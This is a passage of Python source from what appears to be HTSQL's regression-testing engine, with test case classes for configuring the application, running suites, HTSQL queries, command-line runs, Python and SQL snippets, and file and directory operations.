self.updated("*** recording new test output")
else:
self.updated("*** recording updated test output")
return new_output
self.failed()
return self.output
# The actual output coincides with the expected output; note that
# the caller checks if ``case.train() is case.output`` to learn
# if the output is updated.
self.passed()
return self.output
class AppTestCase(SkipTestCase):
"""
Configures the HTSQL application.
"""
name = "app"
hint = """configure the HTSQL application"""
help = """
To run HTSQL requests, the testing engine needs to create an HTSQL
application. This test case allows you to configure the application
parameters.
"""
class Input(TestData):
fields = [
Field('db', DBVal(is_nullable=True),
hint="""the connection URI"""),
Field('extensions', MapVal(StrVal(),
MapVal(StrVal(), AnyVal())),
default={},
hint="""include extra extensions"""),
Field('save', StrVal(), default=None,
hint="""name of the configuration""")
] + SkipTestCase.Input.fields
def out_header(self):
# Overriden to avoid printing the password to the database.
# Clone `input.db`, but omit the password.
db = self.input.db
if db is not None:
sanitized_db = DB(engine=db.engine,
username=db.username,
password=None,
host=db.host,
port=db.port,
database=db.database,
options=db.options)
else:
sanitized_db = "-"
# Print:
# ---------------- ... -
# APP {sanitized_db}
# ({input.location})
self.out_sep()
self.out("%s %s" % (self.name.upper(), sanitized_db), indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Create an application and update the testing state. The created
# application will be in effect for the subsequent tests in the
# current suite and all the nested suites unless overridden.
from htsql import HTSQL
self.state.app = None
try:
self.state.app = HTSQL(self.input.db,
self.input.extensions)
except Exception:
self.out_exception(sys.exc_info())
return self.failed("*** an exception occured while"
" initializing an HTSQL application")
# Record the configuration.
if self.input.save is not None:
self.state.saves[self.input.save] = (self.input.db,
self.input.extensions)
return self.passed()
class LoadAppTestCase(SkipTestCase):
"""
Loads an existing configuration of an HTSQL application.
"""
name = "load-app"
hint = """activate an existing HTSQL application"""
help = """
This test case loads a previously saved application configuration.
"""
class Input(TestData):
fields = [
Field('load', StrVal(),
hint="""name of the configuration"""),
Field('extensions', MapVal(StrVal(),
MapVal(StrVal(), AnyVal())),
default={},
hint="""include extra extensions"""),
Field('save', StrVal(), default=None,
hint="""name of the new configuration""")
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Find the configuration data; complain if not found.
if self.input.load not in self.state.saves:
return self.failed("*** unknown configuration name %s"
% self.input.load)
configuration = self.state.saves[self.input.load]
# Add new extensions.
configuration = configuration+(self.input.extensions,)
# Create an application and update the testing state.
from htsql import HTSQL
self.state.app = None
try:
self.state.app = HTSQL(*configuration)
except Exception:
self.out_exception(sys.exc_info())
return self.failed("*** an exception occured while"
" initializing an HTSQL application")
# Record the new configuration.
if self.input.save is not None:
self.state.saves[self.input.save] = configuration
return self.passed()
class IncludeTestCase(SkipTestCase):
"""
Loads input test data from a file.
"""
name = "include"
hint = """load input data from a file"""
help = """
This test case allows you to execute a test case or a test suite defined
in a separate file.
"""
class Input(TestData):
fields = [
Field('include', StrVal(),
hint="""file containing input test data"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('include', StrVal(),
hint="""file containing input test data"""),
Field('output', ClassVal(TestData),
hint="""the corresponding output test data"""),
]
def __init__(self, routine, state, input, output):
super(IncludeTestCase, self).__init__(routine, state, input, output)
# Load the input data and create the corresponding test case.
self.included_input = routine.load_input(self.input.include)
case_class = self.included_input.case_class
self.included_output = None
if self.output is not None:
if case_class.matches(self.included_input, self.output.output):
self.included_output = self.output.output
self.case = case_class(routine, state,
self.included_input,
self.included_output)
def get_suites(self):
# Get the set of nested suites.
return self.case.get_suites()
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Run the included test.
self.case.verify()
def train(self):
# Check if the test is skipped.
if self.skipped():
return self.output
# Run the included test; get the output.
new_output = self.case.train()
# Three outcomes are possible: the test generated no output, in this
# case we don't need to create an output record either; the test
# generated new or updated output, we have to update our output as
# well; and finally, the test output didn't change, we could keep
# ours too.
if new_output is None:
output = None
elif new_output is not self.included_output:
output = self.make_output(include=self.input.include,
output=new_output)
else:
output = self.output
return output
class SuiteTestCase(SkipTestCase):
"""
Implements a container of test cases.
"""
name = "suite"
hint = """contains other test cases"""
help = """
A test suite is a container of test cases. Typically, it is the
top-level test case in a test file.
The testing engine allows you to specify what suites to run by their
ids.
"""
class Input(TestData):
fields = [
Field('title', StrVal(),
hint="""the description of the suite"""),
Field('id', StrVal(), None,
hint="""the code name of the suite"""),
Field('output', StrVal(), None,
hint="""file to save the output of the tests"""),
Field('tests', SeqVal(ClassVal(TestData)),
hint="""a list of test inputs"""),
] + SkipTestCase.Input.fields
def init_attributes(self):
# When `id` is not specified, generate it from the title.
if self.id is None:
self.id = self.title.lower().replace(' ', '-')
class Output(TestData):
fields = [
Field('id', StrVal(),
hint="""the code name of the suite"""),
Field('tests', SeqVal(ClassVal(TestData)),
hint="""a list of test outputs"""),
]
def __init__(self, routine, state, input, output):
super(SuiteTestCase, self).__init__(routine, state, input, output)
# A test suite has an ability to save its test output to a separate
# file. In this case, `self.ext_output` contains the test data
# loaded from the file.
self.ext_output = None
if input.output is not None and os.path.exists(input.output):
ext_output = routine.load_output(input.output)
if self.matches(input, ext_output):
self.ext_output = ext_output
# Generate a list of test cases.
self.cases = []
self.cases_state = TestState()
self.init_cases()
def init_cases(self):
# Generate a list of test cases. We have two independent lists:
# one containing input test records and the other containing
# output test records. Our goal is to find matching pairs and
# generate the corresponding test cases.
# The matching pairs of input and output data.
pairs = []
# List of available output records. We need to copy it since
# it is going to be modified.
available_outputs = []
if self.ext_output is not None:
available_outputs = self.ext_output.tests[:]
elif self.output is not None:
available_outputs = self.output.tests[:]
# For each input record, find the matching output record.
for input in self.input.tests:
case_class = input.case_class
for idx, output in enumerate(available_outputs):
if case_class.matches(input, output):
pairs.append((input, output))
del available_outputs[idx]
break
else:
pairs.append((input, None))
# Initialize the test cases.
for input, output in pairs:
case_class = input.case_class
case = case_class(self.routine, self.cases_state, input, output)
self.cases.append(case)
def get_suites(self):
# Get a set of (this and) the nested suites.
suites = set([self.input.id])
for case in self.cases:
suites |= case.get_suites()
return suites
def out_header(self):
# Print the header:
# ================ ... =
# {input.title}
# ({input.location})
self.out_sep("=")
self.out(self.input.title, indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def skipped(self):
# Check if the suite should not be executed.
# Check if the test case was explicitly disabled.
if super(SuiteTestCase, self).skipped():
return True
# The suite is skipped when:
# - the user specified an explicit list of the suites to run;
# - and the suite is not one of them;
# - and the suite does not contain any selected nested suite;
# - and the suite is not nested in some selected suite.
if not self.routine.suites:
return False
if self.state.with_all_suites:
return False
if self.input.id in self.routine.suites:
self.cases_state.with_all_suites = True
return False
if self.get_suites() & set(self.routine.suites):
return False
return True
def verify(self):
# Run the suite.
# Push the current state to the cases state.
self.state.push(self.cases_state)
# Check if the suite is disabled or if the user specified
# the suites to run and this one is not among them.
if self.skipped():
return
# Display the headers.
self.out_header()
# Run the nested test cases.
for case in self.cases:
case.verify()
# Check if the user asked to halt the testing.
if self.cases_state.is_exiting:
break
# Pull the statistical information from the cases state.
self.state.pull(self.cases_state)
def train(self):
# Run the suite; update the test output if necessary.
# Push the current state to the cases state.
self.state.push(self.cases_state)
# Check if the suite is disabled or if the user specified
# the suites to run and this one is not among them.
if self.skipped():
return self.output
# A dictionary containing the output (or `None`) generated by test
# cases when it differs from the existing test output.
new_output_by_case = {}
# Display the header.
self.out_header()
# Run the nested tests.
for case in self.cases:
new_output = case.train()
# Record modified output data.
if new_output is not case.output:
new_output_by_case[case] = new_output
# Check if the user asked to halt the testing.
if self.cases_state.is_exiting:
break
# Pull the statistical information from the cases state.
self.state.pull(self.cases_state)
# Generate a new output record.
output = self.make_output(new_output_by_case)
# The output is kept in a separate file.
if self.input.output is not None:
# If the output has been updated, ask the user if they want
# to save it.
if output is not self.ext_output:
self.out_sep()
reply = self.ask_save()
if reply is DO_DISCARD:
# `self.output` may still be not ``None`` if the `output`
# field was recently added. In that case, we don't want
# to delete the regular output data until it is saved
# to a separate file.
return self.output
self.out("*** saving test output data to %r"
% self.input.output)
self.routine.save_output(self.input.output, output)
# Returning `None` since the output is saved to a separate file.
return None
return output
def make_output(self, new_output_by_case):
# Generate the output test data.
# Here we update the list of output test records. Note that the list
# may contain some inactive output records. These output records
# do not correspond to any input records and thus have no respective
# test case. It may happen if the user removed or modified the input
# data. Since a test case may be only temporarily disabled, we never
# remove inactive output records unless the `--purge` option is enabled.
# The list of the output records.
tests = []
# Start with the original list of output records.
if self.output is not None:
tests = self.output.tests[:]
if self.ext_output is not None:
tests = self.ext_output.tests[:]
# `--purge` is enabled, we don't have to keep inactive records,
# so simply generate the list from scratch.
if self.routine.purge and not self.state.is_exiting:
tests = []
for case in self.cases:
output = case.output
if case in new_output_by_case:
output = new_output_by_case[case]
if output is not None:
tests.append(output)
# Some test cases generated new output, so we need to update the list.
elif new_output_by_case:
# Here we take the original list of records and replace those
# that have been updated. We may also encounter a new output
# record, which has no corresponding old record in the list.
# For that new record, we need to find a position in the list.
# We want the order of the output records to match the order
# of their respective input records, so to ensure this, we
# put any new record immediately after all other records processed
# so far.
# Position to put new records.
next_idx = 0
for case in self.cases:
# The record has been added, removed or updated.
if case in new_output_by_case:
new_output = new_output_by_case[case]
# The record is rarely entirely removed so we should almost
# never get ``None`` here. If we do, do nothing.
if new_output is not None:
# This is an updated record: replace the old record
# and update the position for the following new
# records.
if case.output in tests:
idx = tests.index(case.output)
tests[idx] = new_output
if idx >= next_idx:
next_idx = idx+1
# This is a new record: place it to the designated
# position.
else:
tests.insert(next_idx, new_output)
next_idx += 1
# The record has not been changed.
else:
# Make sure any new record will go after this one.
if case.output in tests:
idx = tests.index(case.output)
if idx >= next_idx:
next_idx = idx+1
# When there are no test output data, skip creating the output record.
if not tests:
return None
# Now we need to check if the new output list coincides with the old
# one, in which case we don't want to create a new output record.
if self.input.output is not None:
if self.ext_output is not None and self.ext_output.tests == tests:
return self.ext_output
else:
if self.output is not None and self.output.tests == tests:
return self.output
# Generate and return new output data.
output = super(SuiteTestCase, self).make_output(id=self.input.id,
tests=tests)
return output
class QueryTestCase(RunAndCompareTestCase):
"""
Performs an HTSQL query.
"""
name = "query"
hint = """execute an HTSQL query"""
help = """
This test case executes an HTSQL query.
"""
class Input(TestData):
fields = [
Field('uri', StrVal(),
hint="""the HTSQL query"""),
Field('method', ChoiceVal(['GET', 'POST']), 'GET',
hint="""the HTTP method (GET or POST)"""),
Field('remote_user', StrVal(), None,
hint="""the HTTP remote user"""),
Field('headers', MapVal(StrVal(), StrVal()), None,
hint="""the HTTP headers"""),
Field('content_type', StrVal(), None,
hint="""the content type of HTTP POST data"""),
Field('content_body', StrVal(), None,
hint="""the HTTP POST data"""),
Field('expect', IntVal(), 200,
hint="""the HTTP status code to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the response body"""),
Field('ignore_headers', BoolVal(), False,
hint="""ignore the response headers"""),
] + SkipTestCase.Input.fields
def init_attributes(self):
# Check that `content-type` and `content-body` are set only if
# the HTTP method is `POST`.
if self.method == 'GET':
if self.content_type is not None:
raise ValueError("unexpected content-type parameter"
" for a GET request")
if self.content_body is not None:
raise ValueError("unexpected content-body parameter"
" for a GET request")
if self.method == 'POST':
if self.content_body is None:
raise ValueError("no expected content-body parameter"
" for a POST request")
class Output(TestData):
fields = [
Field('uri', StrVal(),
hint="""the HTSQL query"""),
Field('status', StrVal(),
hint="""the response status line"""),
Field('headers', SeqVal(SeqVal(StrVal(), length=2)),
hint="""the response headers"""),
Field('body', StrVal(),
hint="""the response body"""),
]
def init_attributes(self):
# Convert the list of two-element lists to a list of pairs.
self.headers = [(key, value) for key, value in self.headers]
def out_header(self):
# Display the header:
# ---------------- ... -
# {method} {uri}
# ({input.location})
# Remote-User: {remote_user}
# {header}: value
# ...
# Content-Type: {content_type}
#
# {content_body}
self.out_sep()
self.out("%s %s" % (self.input.method, self.input.uri), indent=2)
self.out("(%s)" % self.input.location, indent=2)
if self.input.remote_user is not None:
self.out("Remote-User: %s" % self.input.remote_user, indent=2)
if self.input.headers:
for key in sorted(self.input.headers):
value = self.input.headers[key]
self.out("%s: %s" % (key, value), indent=2)
if self.input.content_type is not None:
self.out("Content-Type: %s" % self.input.content_type, indent=2)
self.out()
if self.input.content_body:
self.out_lines(self.input.content_body.splitlines(), indent=2)
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if old_output.status != new_output.status:
return True
if not self.input.ignore_headers:
if old_output.headers != new_output.headers:
return True
if not self.input.ignore:
if old_output.body != new_output.body:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
lines = []
lines.append(output.status)
for header, value in output.headers:
lines.append("%s: %s" % (header, value))
lines.append("")
lines.extend(output.body.splitlines())
return lines
def execute(self):
# Execute the query; return the output.
# Prepare the HTSQL application.
app = self.state.app
if app is None:
return self.failed("*** no HTSQL application is defined")
# Prepare and execute the query.
request = Request.prepare(method=self.input.method,
query=self.input.uri,
remote_user=self.input.remote_user,
content_type=self.input.content_type,
content_body=self.input.content_body,
extra_headers=self.input.headers)
response = request.execute(app)
# Check if the response is valid.
if response.exc_info is not None:
self.out_exception(response.exc_info)
return self.out("*** an exception occured"
" while executing the query")
if not response.complete():
return self.out("*** the response is not complete")
# Generate the output record.
new_output = self.make_output(uri=self.input.uri,
status=response.status,
headers=response.headers,
body=response.body)
# Check if we get the expected status code (200, by default).
# If not, display the response and discard the output.
if not response.status.startswith(str(self.input.expect)):
self.out_diff(self.output, new_output)
return self.out("*** unexpected status code: %s"
% response.status)
return new_output
class CtlTestCase(RunAndCompareTestCase):
"""
Executes a script routine.
"""
name = "ctl"
hint = """execute a routine"""
help = """
This test case simulates a run of the HTSQL command-line application.
"""
class Input(TestData):
fields = [
Field('ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', IntVal(), 0,
hint="""the exit code to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the exit code and the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
Field('exit', IntVal(),
hint="""the exit code"""),
]
def out_header(self):
# Display the header:
# ---------------- ... -
# {EXECUTABLE} {ctl}
# ({input.location})
self.out_sep()
executable = os.path.basename(self.routine.executable)
command_line = " ".join([executable.upper()]+self.input.ctl)
self.out(command_line, indent=2)
self.out("(%s)" % self.input.location, indent=2)
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.exit != new_output.exit:
return True
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Run the routine; return the output
# Prepare the standard streams and the script instance.
stdout = io.StringIO()
stderr = stdout
stdin = TermStringIO(self.input.stdin, stdout)
command_line = [self.routine.executable]+self.input.ctl
# The script class.
ctl_class = self.routine.ctl.__class__
# Initialize and execute the script; check for exceptions.
try:
ctl = ctl_class(stdin, stdout, stderr)
exit = ctl.main(command_line)
except:
self.out_exception(sys.exc_info())
return self.out("*** an exception occured"
" while running the application")
# Normalize the exit code.
if exit is None:
exit = 0
elif not isinstance(exit, int):
stderr.write(str(exit))
exit = 1
# Generate a new output record.
new_output = self.make_output(ctl=self.input.ctl,
stdout=stdout.getvalue(),
exit=exit)
# Check if we get the expected exit code; if not, display
# the content of stdout and discard the output record.
if not self.input.ignore:
if new_output.exit != self.input.expect:
self.out_diff(self.output, new_output)
return self.out("*** unexpected exit code: %s" % exit)
return new_output
class Fork(object):
"""
Keeps information on the started processes.
Class attributes:
`active_forks`
The global list of active processes.
`is_atexit_registered`
Indicates whether an :func:`atexit.atexit` callable was registered.
The callable is called when the script is about to finish and kills
any remaining active processes.
Attributes:
`process` (an instance of :class:`subprocess.Popen`)
The wrapped process.
`temp_path` (a string)
A directory containing two files: `input` and `output`, which
keeps the content of the standard input and the standard output
respectively.
"""
active_forks = []
is_atexit_registered = False
@classmethod
def start(cls, executable, arguments, input):
"""
Starts a new process.
`executable`
The path to the executable.
`arguments`
The list of arguments (not including the executable).
`input`
The content of the standard input.
Returns a new :class:`Fork` instance.
"""
# Create a temporary directory with the files 'input' and 'output'.
temp_path = tempfile.mkdtemp()
stream = open("%s/input" % temp_path, 'wb')
stream.write(input)
stream.close()
# Prepare the standard input and the standard output streams.
stdin = open("%s/input" % temp_path, 'rb')
stdout = open("%s/output" % temp_path, 'wb')
# Start the process.
try:
process = subprocess.Popen([executable]+arguments,
stdin=stdin,
stdout=stdout,
stderr=subprocess.STDOUT)
except:
shutil.rmtree(temp_path)
raise
# Return a new `Fork` instance.
return cls(process, temp_path)
@classmethod
def atexit(cls):
# Finalize any remaining active processes.
for fork in cls.active_forks:
fork.end()
@classmethod
def atexit_register(cls):
# Register the `atexit` callable if not done already.
if not cls.is_atexit_registered:
atexit.register(cls.atexit)
cls.is_atexit_registered = True
def __init__(self, process, temp_path):
# Sanity check on the arguments.
assert isinstance(process, subprocess.Popen)
assert isinstance(temp_path, str) and os.path.isdir(temp_path)
self.process = process
self.temp_path = temp_path
# Save themselves in the global list of active processes.
self.active_forks.append(self)
# Register the `atexit` callback.
self.atexit_register()
def end(self):
"""
Ends the process.
Returns the content of the standard output.
"""
# Terminate the process if it is still alive.
if self.process.poll() is None:
self.process.terminate()
time.sleep(1.0)
# Read the standard output.
stream = open("%s/output" % self.temp_path, 'rb')
output = stream.read()
stream.close()
# Remove the temporary directory.
shutil.rmtree(self.temp_path)
# Remove it from the list of active processes.
self.active_forks.remove(self)
return output
class StartCtlTestCase(SkipTestCase):
"""
Starts a long-running routine.
"""
name = "start-ctl"
hint = """execute a long-running routine"""
help = """
This test case starts a long-running the HTSQL command-line
application. Use the `end-ctl` test case to finalize the application
and check the output.
"""
class Input(TestData):
fields = [
Field('start_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard output"""),
Field('sleep', UFloatVal(), 0,
hint="""sleep for the specified number of seconds"""),
] + SkipTestCase.Input.fields
def verify(self):
# Execute the test.
# Check if the test case is skipped.
if self.skipped():
return
# Check if an application with the same command-line parameters
# has already been started.
key = tuple(self.input.start_ctl)
if key in self.state.forks:
return self.fork("*** the application is already started")
# Start and save the process.
fork = Fork.start(self.routine.executable,
self.input.start_ctl,
self.input.stdin)
self.state.forks[key] = fork
class EndCtlTestCase(RunAndCompareTestCase):
"""
Terminates a long-running routine.
"""
name = "end-ctl"
hint = """terminate a long-running routine"""
help = """
This test case allows you to terminate a long-running routine started
with `start-ctl`.
"""
class Input(TestData):
fields = [
Field('end_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('ignore', BoolVal(), False,
hint="""ignore the exit code and the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('end_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdout', StrVal(),
hint="""the standard output"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Execute the test case.
# Find the active process with the same command-line artguments.
key = tuple(self.input.end_ctl)
if key not in self.state.forks:
return self.out("*** the application has not been started")
fork = self.state.forks.pop(key)
# Terminate the process; get the standard output.
stdout = fork.end()
# Create and return the output record.
new_output = self.make_output(end_ctl=self.input.end_ctl,
stdout=stdout)
return new_output
class PythonCodeTestCase(RunAndCompareTestCase):
"""
Executes arbitrary Python code.
"""
name = "python"
hint = """execute Python code"""
help = """
This test case allows you to execute arbitrary Python code.
"""
class Input(TestData):
fields = [
Field('py', WordVal(),
hint="""the code name"""),
Field('code', StrVal(),
hint="""Python code"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', StrVal(), None,
hint="""the name of an exception to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('py', WordVal(),
hint="""the code name"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Execute the test case.
# Prepare new standard streams.
old_stdin = sys.stdin
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdin = io.StringIO(self.input.stdin)
sys.stdout = io.StringIO()
sys.stderr = sys.stdout
# Prepare the code.
code = self.load()
context = {'state': self.state}
# Execute the code.
exc_info = None
try:
exec(code, context)
except:
exc_info = sys.exc_info()
# Make new output record.
key = self.input.fields[0].attribute
new_output = self.make_output(stdout=sys.stdout.getvalue(),
**{key: getattr(self.input, key)})
# Restore old standard streams.
sys.stdin = old_stdin
sys.stdout = old_stdout
sys.stderr = old_stderr
# An exception occured while running the code.
if exc_info is not None:
# Display the output and the exception
self.out_diff(self.output, new_output)
self.out_exception(exc_info)
exc_name = exc_info[0].__name__
# The exception was unexpected: discard the output.
if self.input.expect is None or self.input.expect != exc_name:
return self.out("*** an unexpected exception occured")
else:
# We didn't get the expected exception: discard the output.
if self.input.expect is not None:
return self.out("*** an expected exception did not occur")
return new_output
def load(self):
# Get the script source code.
return self.input.code
class PythonCodeIncludeTestCase(PythonCodeTestCase):
"""
Executes arbitrary Python code loaded from a file.
"""
name = "python-include"
hint = """load and execute Python code"""
help = """
This test case allows you to execute arbitrary Python code
loaded from a file.
"""
class Input(TestData):
fields = [
Field('py_include', StrVal(),
hint="""the file containing Python code"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', StrVal(), None,
hint="""the name of an exception to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('py_include', StrVal(),
hint="""the file containing Python code"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
]
def load(self):
# Get the script code from the given file
stream = open(self.input.py_include, 'rb')
code = stream.read()
stream.close()
return code
class SQLTestCase(SkipTestCase):
"""
Executes a SQL query.
"""
name = "sql"
hint = """execute a SQL statement"""
help = """
This test case executes one or multiple SQL statements.
"""
class Input(TestData):
fields = [
Field('connect', DBVal(),
hint="""the connection URI"""),
Field('sql', StrVal(),
hint="""the statements to execute"""),
Field('autocommit', BoolVal(), False,
hint="""use the auto-commit mode"""),
Field('ignore', BoolVal(), False,
hint="""ignore any errors"""),
] + SkipTestCase.Input.fields
def out_header(self):
# Print:
# ---------------- ... -
# {first line of input.sql}
# ({input.location})
self.out_sep()
first_line = self.input.sql.split('\n', 1)[0]
self.out(first_line, indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Load the SQL input data.
sql = self.load()
# Generate an HTSQL application. We need an application instance
# to split the SQL data and to connect to the database, but we
# never use it for executing HTSQL queries.
from htsql import HTSQL
from htsql.core.error import Error
from htsql.core.connect import connect
from htsql.core.split_sql import split_sql
try:
app = HTSQL(self.input.connect)
except Exception as exc:
self.out_exception(sys.exc_info())
return self.failed("*** an exception occured while"
" initializing an HTSQL application")
# Activate the application so that we could use the splitter
# and the connection adapters.
with app:
# Realize a splitter and split the input data to individual
# SQL statements.
try:
statements = list(split_sql(sql))
except ValueError as exc:
return self.failed("*** invalid SQL: %s" % exc)
# Realize the connector and connect to the database.
try:
connection = connect(with_autocommit=self.input.autocommit)
cursor = connection.cursor()
except Error as exc:
return self.failed("*** failed to connect to the database:"
"\n%s" % exc)
# Execute the given SQL statements.
for statement in statements:
try:
# Execute the statement in the current connection.
cursor.execute(statement)
except Error as exc:
# Display the statement that caused a problem.
for line in statement.splitlines():
self.out(line, indent=4)
# Normally, we end the test case when an error occurs,
# but if `ignore` is set, we just break the loop.
if not self.input.ignore:
return self.failed("*** failed to execute SQL:"
"\n%s" % exc)
break
# No error occurred while executing the SQL statements.
else:
# Commit the transaction unless `autocommit` mode is set.
# Again, respect the `ignore` flag.
if not self.input.autocommit:
try:
connection.commit()
except Error as exc:
if not self.input.ignore:
return self.failed("*** failed to commit"
" a transaction:\n%s" % exc)
# Close the connection. Note that we insist that connection
# is opened and closed successfully regardless of the value
# of the `ignore` flag.
try:
connection.close()
except Error as exc:
return self.failed("*** failed to close the connection:"
"\n%s" % exc)
# If we reached that far, we passed the test.
return self.passed()
def load(self):
"""
Returns the SQL data to execute.
"""
# Override when subclassing.
return self.input.sql
class SQLIncludeTestCase(SQLTestCase):
"""
Loads SQL queries from a file and executes them.
"""
name = "sql-include"
hint = """load and execute SQL statements"""
help = """
This test case loads SQL statements from a file and execute them.
"""
class Input(TestData):
fields = [
Field('connect', DBVal(),
hint="""the connection URI"""),
Field('sql_include', StrVal(),
hint="""the file containing SQL statements"""),
Field('autocommit', BoolVal(), False,
hint="""use the auto-commit mode"""),
Field('ignore', BoolVal(), False,
hint="""ignore any errors"""),
] + SkipTestCase.Input.fields
def out_header(self):
# Print:
# ---------------- ... -
# SQL-INCLUDE {input.sql_include}
# ({input.location})
self.out_sep()
self.out("%s %s" % (self.name.upper(), self.input.sql_include),
indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def load(self):
# Load SQL from the given file.
stream = open(self.input.sql_include, 'rb')
sql = stream.read()
stream.close()
return sql
class WriteToFileTestCase(SkipTestCase):
"""
Writes some data to a file.
"""
name = "write-to-file"
hint = """write some data to a file"""
help = None
class Input(TestData):
fields = [
Field('write', StrVal(),
hint="""the file name"""),
Field('data', StrVal(),
hint="""the data to write"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Write the data to the file.
stream = open(self.input.write, 'wb')
stream.write(self.input.data)
stream.close()
class ReadFromFileTestCase(RunAndCompareTestCase):
"""
Reads the file content.
"""
name = "read-from-file"
hint = """read the content of a file"""
help = None
class Input(TestData):
fields = [
Field('read', StrVal(),
hint="""the file name"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('read', StrVal(),
hint="""the file name"""),
Field('data', StrVal(),
hint="""the content of the file"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
return (old_output.data != new_output.data)
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.data.splitlines()
def execute(self):
# Execute the test.
# Check if the file exists.
if not os.path.exists(self.input.read):
return self.out("*** file %r does not exist" % self.input.read)
# Read the data and create the output record.
stream = open(self.input.read, 'rb')
data = stream.read()
stream.close()
new_output = self.make_output(read=self.input.read, data=data)
return new_output
class RemoveFilesTestCase(SkipTestCase):
"""
Removes the specified files.
"""
name = "remove-files"
hint = """remove the specified files"""
help = """
Remove a list of files. It is not an error if some of the files do not
exist.
"""
class Input(TestData):
fields = [
Field('remove', SeqVal(StrVal()),
hint="""a list of files to remove"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Remove the given files.
for path in self.input.remove:
if os.path.exists(path):
os.unlink(path)
class MakeDirTestCase(SkipTestCase):
"""
Creates a directory.
"""
name = "make-dir"
hint = """create a directory"""
help = """
Create a directory. If necessary, all intermediate directories are also
created.
"""
class Input(TestData):
fields = [
Field('mkdir', StrVal(),
hint="""the directory name"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Create the directory if it does not already exist.
if not os.path.isdir(self.input.mkdir):
os.makedirs(self.input.mkdir)
class RemoveDirTestCase(SkipTestCase):
"""
Removes a directory.
"""
name = "remove-dir"
hint = """remove a directory"""
help = """
Removes a directory with all its content. It is not an error if the
directory does not exist.
"""
class Input(TestData):
fields = [
Field('rmdir', StrVal(),
hint="""the directory name"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Remove the directory with all its content (DANGEROUS!).
if os.path.exists(self.input.rmdir):
shutil.rmtree(self.input.rmdir)
class TestState(object):
"""
Keeps the mutable state of the testing process.
`app`
The current HTSQL application.
`forks`
A mapping from command-line parameters to :class:`Fork`
instances; contains long-running applications.
`toggles`
A set of active named toggles.
`saves`
A mapping of named application configurations.
`with_all_suites`
Indicates that the current suite or one of its ancestors
was explicitly selected by the user.
`passed`
The current number of passed tests.
`failed`
The current number of failed tests.
`updated`
The current number of updated tests.
`is_exiting`
Indicates whether the user asked to halt the testing.
"""
def __init__(self, app=None, forks=None, toggles=None, saves=None,
with_all_suites=False, passed=0, failed=0, updated=0,
is_exiting=False):
self.app = app
self.forks = forks or {}
self.toggles = toggles or set()
self.saves = saves or {}
self.with_all_suites = with_all_suites
self.passed = passed
self.failed = failed
self.updated = updated
self.is_exiting = is_exiting
def push(self, other):
"""
Push the state data to a derived state.
`other` (:class:`TestState`)
A derived state, the state created by a suite for
the suite test cases.
"""
other.app = self.app
other.forks = self.forks.copy()
other.toggles = self.toggles.copy()
other.saves = self.saves.copy()
other.with_all_suites = self.with_all_suites
other.passed = self.passed
other.failed = self.failed
other.updated = self.updated
other.is_exiting = self.is_exiting
def pull(self, other):
"""
